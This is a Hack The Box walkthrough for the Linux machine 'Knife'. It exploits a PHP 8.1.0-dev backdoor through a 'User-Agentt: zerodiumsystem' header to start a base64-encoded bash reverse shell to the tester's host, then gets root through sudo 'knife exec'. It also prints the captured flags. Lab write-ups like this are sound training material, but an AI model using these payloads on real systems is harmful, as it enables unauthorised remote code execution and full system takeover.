Knife
3 minutes to read
Hack The Box. Linux. Easy machine. This machine contains a webpage built on PHP with a version that has a backdoor and sudo permissions configured. Knowledge of the PHP version and basic privilege escalation skills are needed to compromise this machine
- OS: Linux
- Difficulty: Easy
- IP Address: 10.10.10.242
- Release: 22 / 05 / 2021
Port scanning
# Nmap 7.92 scan initiated as: nmap -sC -sV -oN nmap/targeted 10.10.10.242 -p 22,80
Nmap scan report for 10.10.10.242
Host is up (0.053s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 10.72 seconds
This machine has ports 22 (SSH) and 80 (HTTP) open.
Enumeration
If we go to http://10.10.10.242 we will see this website:
Looking at the HTTP headers of the response, we find that it is using PHP/8.1.0-dev:
$ curl 10.10.10.242 -I
HTTP/1.1 200 OK
Date:
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Content-Type: text/html; charset=UTF-8
The issue is that this development version was released with a backdoor. Putting a header: User-Agentt: zerodiumsystem("whoami"); in the request executes the command whoami (more information here).
Foothold
Let’s use a reverse shell:
$ echo -n 'bash -i >& /dev/tcp/10.10.17.44/4444 0>&1' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx
$ curl 10.10.10.242 -H 'User-Agentt: zerodiumsystem("echo YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTcuNDQvNDQ0NCAwPiYx | base64 -d | bash");'
$ nc -nlvp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.242.
Ncat: Connection from 10.10.10.242:54378.
bash: cannot set terminal process group (950): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
james@knife:/$ ^Z
zsh: suspended ncat -nlvp 4444
$ stty raw -echo; fg
[1] + continued ncat -nlvp 4444
reset xterm
james@knife:/$ export TERM=xterm
james@knife:/$ export SHELL=bash
james@knife:/$ stty rows 50 columns 158
System enumeration
We enter the machine as james:
james@knife:/$ cd
james@knife:~$ cat user.txt
3c9359d46d35b73071095b9ef4e0dcf0
This user can execute knife as root without password:
james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
Privilege escalation
Reading the help panel of knife it can be found a way to execute Ruby scripts using knife exec. So, /bin/bash can be executed as root from a Ruby script. We can also check GTFOBins or use my tool gtfobins-cli:
$ gtfobins-cli --sudo knife
knife ==> https://gtfobins.github.io/gtfobins/knife/
Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudo knife exec -E 'exec "/bin/sh"'
james@knife:~$ sudo knife exec -E 'exec "/bin/bash"'
root@knife:/home/james# cd
root@knife:~# cat root.txt
b631aac1a84b2e5cf9063d641735eb59